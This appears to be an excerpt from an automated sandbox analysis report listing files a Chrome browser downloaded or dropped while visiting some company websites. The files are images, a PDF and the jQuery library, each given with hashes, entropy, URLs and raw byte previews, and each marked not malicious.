                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 32 0 R/MarkInfo<</Marked true>>/Metadata 133 0 R/ViewerPreferences 134 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 27 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 18 0 R/F6 22 0 R/F7 24 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image15 15 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 17 0 R 20 0 R 21 0 R 26 0 R] /MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2964>>..stream..x....n.8.=@......]R1.ln.t0M3...A1Xx.'5...../...s..DJr,c..%.#....z|....7...O.'......|:.,..:.|..._M...f.\._?....~.Mog...&..g........8...h*..... .....?.........5'....... 4#.D.2.H.GT.2y..7..._..........S@...........)0..K..wt2.Q.....N..B.\.G.......P..l.24...G2.....?^..u..k..@......5t?^]...a....yQIL../..N...J.*...:n
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 2546 x 672, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):56596
                                              Entropy (8bit):7.778590597603965
                                              Encrypted:false
                                              SSDEEP:1536:eMel8LY6lPNep/3WXkp2bdC8R7klC4nCNZIwRK:eB2pNemX10lC4GIwRK
                                              MD5:9A3673D3FBBFFEB5B80237CEBBCD77A7
                                              SHA1:408D4A7F6BEFE67267D9B4B64DB1990B75B1C7C6
                                              SHA-256:678F4D0FB7A8F638D31032F18719AC8FAEAFF49DFB55967996739120724042B7
                                              SHA-512:9F2F9B0234D4151880BEEAEE7CED261261E4C48DE49245ABEA1E89080CAC6BB7F22F37A170007E01831A131186D60FE84139B8A457AE706D2E3FB1E61D62DD56
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...BiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.2 (20231101.m.2385 38bb2d3) (Windows)" xmpMM:InstanceID="xmp.iid:6744F40C805F11EE8CF1DAAAB856DA4F" xmpMM:DocumentID="xmp.did:6744F40D805F11EE8CF1DAAAB856DA4F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6744F40A805F11EE8CF1DAAAB856DA4F" stRef:documentID="xmp.did:6744F40B805F11EE8CF1DAAAB856DA4F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>$S.....hIDATx......U.?.;.!H..$.....#..A..YX.s....f.5.k......."("&...YwY.k......2....S
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):81372
                                              Entropy (8bit):7.9976389646778365
                                              Encrypted:true
                                              SSDEEP:768:6iXS0recmr/GqPgA2KyfAEFVVrFMFX93gYl+h2ZzjHf9Ft2EhMv8XylAmg2RT9hZ:1re5/G7RfiNeY/Vetlf/CccdPkzaUb
                                              MD5:684984E0053E89A423D64AE116611FA2
                                              SHA1:210BADE125DD428731E6CF539243995D6CC7DE54
                                              SHA-256:122F858A8EA09352FF302265669BCE97159DD73E2B846B966C8ADDFC04CF3AD4
                                              SHA-512:7E540E2D9A43A213663B1D524D3D912D62EF254DAB079305AC40EB855F3DFCBB3153E6A3D44E6A19B905BE03E18C9DC0D02050C9BCF61ED918920D587214621B
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.=..WEBPVP8X..............VP8 `=..p....*....>.l.P.&2....3...Ig.N.g..Y.M....wJ.w.A....,d.._s...>....${.l-.......s..7..dC.Y..G}..^...z\.....c........j=J........E.c.c.......aO.o7_C.......?..*....=....t.....?....[...c......h...'...ve?......._....[..1....y.V..~O..&`pH.E..r......%.....z;.T......o..".jvY..9$...q.....mI.....n...fx.Dd0...q`at.S..D.4....I5m...H..cl7.Ck..g.....;...O.....c].{...=.o".....R^fn.$H...h|l.O.0.<.M..0.w"...5..~U..fO..+_?......fbp..jj....6..8_.o{..p..pR...B.....U..s. hD.......6h..j..d..8.......D.o.i.D).....b.=.47...(....8..7.?.z.........k..F]|..X.W.R/.}..]...l.Yk..nzG..g..Zo....o...No...h..W.p..l.;..Vy.......9..X.y.. .k?.eC6.].k..n>..D.{.........kc2.Fc.a.|.qv...I^....^.-1_..;....:.A29m...."......W.."..Q..RR.K........,..G../.O?.....D..~..).jYn..,#....7..Z....lw.r. ..^..K3"]......"~'..6.A....X..g..-N.\L...8..z].@X.?.pQ.vD.K........G>u....OX]...Z.z.xI....q...=....>./.f.P....)8...'.......^.p....8j3......@~c.F.........=p....\
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3895
                                              Entropy (8bit):7.944583262003043
                                              Encrypted:false
                                              SSDEEP:96:3RCov7Kkm3yaMKuQ1cvvZayGg7li1cB3YWrmN65d:3RCov7Kkm3MKu7XUVKli1gYWw6L
                                              MD5:ABB1F2219CACC62144DB85E591B4C6C1
                                              SHA1:548E027F3BA48F5A954BB35313D77922B3C14F10
                                              SHA-256:89E6BA9788A7A8ECB018C537B5BF0A5670A8542F6B2535D33B88F8FF440035EF
                                              SHA-512:A25387A02412D94C2A5D4A51305EE1681E8BAD5A678C22004E98C3C81DC726816E3D9EAC9C37DF42E0607035A2285F1CB64DF6120D7A74C2FDFC66983ED07950
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/ecwid.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.................................................}........|...................{.o................V..&..g.......1..........?..F...........On....eIDATh........CB.%!$. .APTD}..;...3{O9.gzU[..5.YY..I.wcYD).%..[.E....$.V.,N..7.........F.c./Z....4.{0......TI.SX....u.Ek.q\..<u....H....$f.V4...at&.7.K. .x.< !........m.$.~9...Pv9..Z.A......;.T..p.aoi.=!.gHbYDW.aT*'A.....,"?i..P.^.n7...d-|.G./'9fv.N......?ki..}.4Jq..z.....+.....LSA.R2x..|...#'..u.g.z..,..!........'.&k......'.C&..K8.. .=\.y...'..v...9'.wA.p.....$.P@...K}\}.D(.kk.O..J..[.K../\..,.o..tf>.q'.e..p... !QR..{...F...!.}|.I.S.E[..-....Rx_!.......*..A6..7.O.rd:...<.s%=.o...\.^.....p...1Jx..~e..T.. ..O..T.(.\....n.,!............G%....|k..&.....R..;...1...'.zH6.........0.....}...Q.a.......a..p........G....H*...+Z.....X....d...">B..8v.....,.2..=..#....................||_.......}99.V.l.$F..?..;. 9.M.|....tyJ.$.F..+...L}..J3X.y.W.d.a....&._.x.].*.q..a.<..-.}..2S.....:-.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 392x392, segment length 16, baseline, precision 8, 5249x3963, components 3
                                              Category:downloaded
                                              Size (bytes):2444985
                                              Entropy (8bit):7.92273727935342
                                              Encrypted:false
                                              SSDEEP:49152:dA9IyMVJDoa84BHvYQ60Ert3olEnhkkcPKxITaCV:dA9fcJDoaNpvlE5YSnhJcCxway
                                              MD5:48FA6E372B8439044A55221C0857AB49
                                              SHA1:2B2EC03487D6C85C675BB88C01D91D81C9CAA4FB
                                              SHA-256:A17F9DDA7BD2295A97394CB09CF68D72BD20F1939A3E5819DD844B8EF01F4ACC
                                              SHA-512:55E97E5F371C7B5B89A517B95730B2D9036A1D9A653445DC69C83DE03EF87D3CF0F9535BBA42D4EC59BD67C85AB656E5A4E476E590E765D32C7EA2FC27F68ABD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/16/e9cd8560c0fb5980f7f1767f84634dfb.jpg
                                              Preview:......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):94270
                                              Entropy (8bit):7.9817655469616
                                              Encrypted:false
                                              SSDEEP:1536:BiVYWpZdf5goNo8cQVQNrgvgos7mHxg306ObFRl6z6QSX68SnMI1Cx57JB33BenA:8VYydyoe8tVUrahs6606SFP6wq8S1CRR
                                              MD5:96BFC6FA04E67F72AEBCDA070533156A
                                              SHA1:B7C1C40E1A4C049B9C248C5E8CFEE26008765749
                                              SHA-256:E08BE39B07263BAF48BE0E75C6FC8065FF76CABE1FECDA01E5A57414E0FB5268
                                              SHA-512:61BB359418C4F65CD2D7D74F0876769E437C749ADD9446EA721B540DCD9CE165600027B893457D9942FE96B4D265DF63AEE0BFB17F11A08D114C395CF30B0310
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................$..Bj. ......".(.....v.-........P..*V..;{.7. ....(....*.......*........7.).E@..E.P.p........-.....P.b.........DT.....#...S..... ....P.E.....^........@....*............k.9d.k.......T.E...S.5g.........( ...E@.......(.....{W....\.......(....L....D..A@....."...p4s\ ..k...4.>Ob ..".8...@...P..]GA.q....j.(#....AP.....T.DQ..P^...T....E.P...P."(.pu.R."`.(...6.................;N;j.*.(...........&m..M.....@......@....E.....Az~... ...........h..s.6}w...E.PT<........@.P....V..K.n...P..Q......8ADX..m.Z....... .* ..(.........*.S. ..Q..E.D...(.....Y..../.. *.EA|...EE@A@.........l...@...QP..T..E....D..(+o.f...TA..J. ....p\...(......A.2....................i{.>r. *..` .......'............h...5..(3..U@..E...S.%...H...<T.@P@E.Wk..!...k..V.).8..E.4c..k.Z.@Up.( ....P!.'k{?4.@..<TT
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):21576
                                              Entropy (8bit):7.983670910342692
                                              Encrypted:false
                                              SSDEEP:384:VD+KqPsV9zidnOYQ+zecoM4HvcS/zi3zpi5KCt2PRIElfkmOuWr93lVdqj+Ziod6:VD+xPQzEhQ+6cb4PcSYEICtWRIEqNdef
                                              MD5:E5751BE6D4F63180D5FCDBC5C6D8C7B2
                                              SHA1:9C4FC1AA915FC70C375E35EABF5BB061B9DB9867
                                              SHA-256:9049E23B39614BD16EA4121450D8D4FE8F0A6A3CEE559362B269FC0A55F39C2B
                                              SHA-512:F5789A6DFBDC0937210CEA70D07B8507FA58CCB27727595D4C5AB3C5958419DC36DA0800C537C453C932DE57CD916C5BA227B3051FE17C4C436B22403F330C47
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF@T..WEBPVP8L3T../..?....%')2....<r....8......6 .m.:...E.!.K;.o.m#.>.U$I....|......_.3.......0. 6.....`TT..1.C.M........R....Q1 .*....&.8.$..3..]...?YG.D...DNDN. b'b.... Ed@J........Q....7v/..8..+....{. ..!T.....U.K....[./.}o....l....T\.t..Z.+..X...BX.........A.m4sR..l.t<.vL....9..-.l;..c.^..E.....!kA.....S....K.9.;Z.\.q.T*.....a!1.z*.B.d..J...r..~..(.......O.[.~...T..~=.?a.......%....$..\8.=xF../2)&g^....H{..I.....F'&#F.F+^.}.>.Z.*U.T.R.x.1..i.......$..J.B..THUR.. C*E.Z...A....n...T...g..fP.$.."*.....(J;{]=h..wNk......~.!...$I...\..d=`@..N*.=.B.m......GlM...OC........_..I...l.W...=.r..e..fs..E.Kq........!...z..;I..0...cgz.C.(A..R..hf..........m.`6.....|x..-S...b|o~.G..UJ.}l.uH.\....{I...P.'....l p...p.7}]"b.....M.A...P)........%.9.Y..(..aj$&.>S.n.X!..D..];.A...+..d...&.X..B..........O......6....,D.G.G..pT..'GG0...B$.n.[..I........#J..@Fg..Xs...Q<O..v.b6D;S....r....\at.k.Mq47.....#b.Y1.B.P.W.......b..P.+.{.j....442F........4&....k..D....Q
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):18568
                                              Entropy (8bit):7.981634812283508
                                              Encrypted:false
                                              SSDEEP:384:K0wZKC3JcVss+c8NeDhjqxsZKL0/W6WnDH09bsKgakm6+Vz+rrATgAJN:K3lJcZfjDhjq24L0/W6WnDH0ZBhp+80o
                                              MD5:BC838B187D7E563DEC3C9AA8F0B4D80C
                                              SHA1:60AFF6F5802E6DAA88E10219117D117DCE5D19FD
                                              SHA-256:719A86523239FB9CAAEC3AEF8C54ED2AA8D3FC3A3AF474D6891A16F6B101E142
                                              SHA-512:42A426BBE00334E667226B8D04F1F63B12FC9FC6BAF9D95483FDDBB1051E0D7FEE4A4B1AAF4F24851A04F813D9A48CC7576BF0A6377708FE3164BF7DF84A149E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3646
                                              Entropy (8bit):7.941021163218674
                                              Encrypted:false
                                              SSDEEP:48:K83eV+Dy1R9caUyAdnIjwJP1x60RsaGQ05CnlxwC+UgGQmb9GSHT5Bu/j27HUNgq:rusLaUp8Q1xqDUlj+UbbnHQKMgr+
                                              MD5:784E1E5511461376FC21971534AB22A9
                                              SHA1:187930D08CC1C1BC47BD24F38F5F52F2082DBF7E
                                              SHA-256:81CE28A24477D2E8E80F07C2247151D479FAFA52AB59B2D3AADDECBE22FA9894
                                              SHA-512:25896AD98A3B4D4E0BA7C23D3C458D89ECC86107BCA2B57A4ADD1B60E9D993CEFB2D97B67DB9F7BAA96FC9105BC279F2F29221F233DC49C06551E1AE9E052694
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/web-application.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...APLTE....PyR]........R|..........<`.;[....7a.......?e...............PY...............F...............Jr....T....PZ.<...U....L...B\...1^.'Vv.......S..K.....TlP..?...3T.................nv.T\.v..IQ.\e.2t.Fs.......[..]Y.x......MNT.....`...s......2..e.w.6m]V.a.....EJ....k...v.e.._..Z..A..@.....r...o..`....!O...K..T..m(Yz.....IDATh.X.[.l.MH!@...H..%....((..-...Vm....}......L...Q.....d....X....x.o.6...7.e.9....R.\x.......W_]....0yb*.S3.Zqq..Xl..D ...o^-l...n.^..N0L.E..K.%..3.-..E...C.v;.K.!..OV4...V..(...,.n.....Z.a..vA.H(D.~.BX.....W...+....*5...-...-.`...*..,_b.0Xe..q.....X;.UKd.Q......{5.`.(.1..z.$$....6..8.~..i]..Z..(....h..F...%=..'w.....1.....R!.JF.P.78R...z.........e.!7....T....K..].<6paIO.6.j.B.p.P..b.3...4...?n?.(.F.......Ly..y..D.-~x||..i.v".$..!.......?.R.........(-..@"..{...+d.U,...;..`..................f..%cB%.9...(...._d..7.........Nl....R.O<q@ja.+.r@....A.@..../&]....'".z....I........_..e.F....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3099
                                              Entropy (8bit):7.920956092412081
                                              Encrypted:false
                                              SSDEEP:96:b7lJmvDfj4rWMAv7V0CyaxxUvoUoWQcA3:b7lJejj4rWMG7GCzQi/3
                                              MD5:CFAEDFDA908CD0722A403A04FBDED558
                                              SHA1:84E70B87349439C6D660693094ABCF74A655DBB3
                                              SHA-256:A8EDB9C3BEDAB47BFC29B6D3002FBDE4D6785CC63039CF240D50B072B0DE0818
                                              SHA-512:55348AD5DDC5A84891E52EA51F123A5949D668834429E921A89770D09EF1FBA18C0EB16A9607082D37AA1CEECA9DE3B0CE7BD36058A65402F0644019AE129EF5
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...~PLTE.........(.............................&...........#........................../..q...........W..A..................F........6..u...XIDATh...z.:...Fd..V.w.....o.h......G1..,...v.F..h.m...Ul[......~.X.W... &...a.z.-d......-..bc.!..".....3..w:..1._..ar.l..../..Nw....0n.Z...qc...R..u.I.m..7..t&.....m...B....aT....p.~...-2.....d4.4...E....Z..t..I...U41.{..B.Y...>.Xu.l.>h.b.0..K.*...h{..2i...~.U`X..(.2.9....X..@.9.#.g..^.5.....v...z..C..a.j.7.|.!.X0..vX)......-......2....C.(.......b.;.{....m.@[!\.....d.p...|....,&....QU......Q.bQ[...... :d]t...Czn.K7...eY..F.W........L~.a.[1.h.[..^.......<Lq.+..b..J-K..N../.o..d.....O..EW...V...f..........8e_C...v.....vyS..4....P...T...?B....o.G..io./M.K<./.....2... ....K _S.............v..@..F/u.|."G.L../....`.....pH....t<.9*q....4p..`R._....:.VJl.`.d.l ...V=...............r!^1C=.0..P.2.t.....g.0M.X.......S...=6..O]Q...$Go..........~W..&.t/...4.m.oS.....T.....\.y..+F......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65451)
                                              Category:downloaded
                                              Size (bytes):89476
                                              Entropy (8bit):5.2896589255084425
                                              Encrypted:false
                                              SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                              MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                              SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                              SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                              SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                              Malicious:false
                                              Reputation:low
                                              URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5183
                                              Entropy (8bit):7.900332339710944
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZS+5ARYDy0gGceY2JC:UIIHUCD4wa3SoARYDyGcP
                                              MD5:9AFAC2C96B6596962832FBABD8382642
                                              SHA1:152D37FC0C238DBB97C1EBC6ADEB4A2452B83886
                                              SHA-256:DC2BAF8E7BB9C32C7505E8DDF7E3CAF6D99E9EA23081F93A65E91EB5C404B89C
                                              SHA-512:4F9D68FFCE92CA7092070081EF5D379108AFF05C6F018800B3AFAF0965A7137942119E6A14F5749F575B0D72AF71560F9D308BD1C03C8CDCB1975271FF48A67F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/minutes.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4185
                                              Entropy (8bit):7.946165810387893
                                              Encrypted:false
                                              SSDEEP:96:tgPRvAiCHms/xM6g4mTm25CejJgq6KuOhctvRODwhD8ydOg:+ZIiCBxM6gvCe1nniHldOg
                                              MD5:CEFCB1AC8D136024A49DA41F6B1E0033
                                              SHA1:84FE42E40993C44147F7CA15ED728FE551DB02D8
                                              SHA-256:C8312EBFAC348F4A48937B601B0440D68DA6A25234CD83D9A8DE8244275FD309
                                              SHA-512:03E5F03AAAF46106C17932ABDF4A72AF120211D91ECF8286AD6FEF0C5429FDE62595A6F91986B594228A67E310CD7CE21EABA572D9816513A3142A0F90696994
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.............i.....}.................b..u..n........f.....c..w..x..x..\.....b.....t...................G...T.....l.....c..n............>..-....N...v......._.. g.i....+u...h.........[....V......u....QIDATh..W.v.0...J.-.6.m....5.......Y.K.6..$...................c..IF%%..........B..r.G..Hr....B.bs..:N.7.....wHvd.oA..,........zy>........i....<. .09=U..a.V.e1).....G. ...o.h..k.,.c]..K.G.W..9.....f..4MQ...f....1.{."@d...b.."Ud.B...C.4..@.@..!R.......".-.zJdL.........\.....%"J...:y[p..._o.vc...P7..H..t.].j.......@./...s#..-...(.,UUo.....yH....<.uE.j.z)F..F.z...P..q.^..YL@@....F]}..I.K].T. O.-......2R4-.v..._.,!B..:q....g...k.Y....6..{s.E..,..8LS...8...j..[..q..%...A. ...5..tuO.......@u].GU.=.)...y...)\.2.c(.<.C=....z...}4..1%gH..E.%..Q...:+r.L.?j....|.....l...104[.U...*..-.<.........bz..1./k...n.7..d.?j;.r.lT.g......<.B=.\......s>YW..@..H.TB.....`.@|_w....u%ur^V...bS.^..@..}...+.?...ZCa..>4j....).
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):11226
                                              Entropy (8bit):7.517175595162412
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw5rPN97CBrz3UWSUYGi/SwAvZbMPC01q7mrtC:4YNg75rl58noGaMmPL1jC
                                              MD5:7A3BE8D3180DCA255A40AA262DC6B9AA
                                              SHA1:098672821F9BDC1BB8176023E90FBE0DDB413CB1
                                              SHA-256:AD47628C8B643BA9F32AE94425CAEC2B0EC95B99780C5D61BE39A4EF220FF37F
                                              SHA-512:CF65838E6D8ED3FF011F52543563351D3B6E42AA4BE82B2223C976CAC0DBA2B1D2C9007580AE842BE5E328DA208E1E4AF20823C7785207F64484E95F7116C3B7
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):126100
                                              Entropy (8bit):7.998489220764332
                                              Encrypted:true
                                              SSDEEP:3072:xWkzBPDP1QngrQXwucDS73r1Ub1NJBR2l8F0Lb:xWkFPDNQn62ws73JaTbklYy
                                              MD5:55CA39E4C532769EAEE4D3D619E2D788
                                              SHA1:89B2BC21314EC002B21ABD5AF15298E15953E075
                                              SHA-256:06196380D52A5E66B5695647A77AF2E9C834A643866C1FE23820DEC081312519
                                              SHA-512:24EFEAFF31E1E8E28051D510719C041607B105E4CEC9FE25C0296EEDE7ED7A30B1769FDF5119A8560F7B34D2ABA0E342B83CED58B669EE662157B5E11D3D8DDE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/34/2df040a4c38aa8d8468943fbef9cc703.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 ....Pg...*....>.d.O.%,.+Y.2...enP.[?u.7.{..J....^.....y_...n6..~..u?....S...0.'.GJ.2...G..;....g.`..M...{.?.$m.G.h?...}N.s....G..#.....K.....?......}................?.........o...._.},._..l.........z.MO..@.......o.^..P.........O..................>....j...)iT.We...m..Z..A..Ve...^....,..h.....6.>.;o.._B.. .K.ksL..G..z>t2....z...W....!..B..>...Y.;.Y.M..Q......n.;....&i^....c6.....I..l/.:k.2O....S..#...G...a`..+..5.q..H...0V..N.R...[.&..C.........}...a..4..Z.z........uA.../bT].<..{..7.. ........*2'...e....*..._...I6k.CX.#=..........M.G....2......I.+.LD...........@F..5.\!..=.C:8..]....X..B....H.le..i...Y..m.Xv)9;_..N.q,1.9.....9...;..#..I....hC..t.........7.a..IP.'.R.....=).....|3.&c..5.^f.......0^@M..E..h..RL.~..8..A$..h}..L..i\...{.s.]8.!._.\u......\..H.$..u.g.....{.3.#Y..D.K.P.>..!.M.O.X...u................E.e.!u..m.U.%....7...T..@...].V..'.q..}..._.kJ.........d[...i..O....do....$TxT.....<.F.q...........V.:2ES
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):569
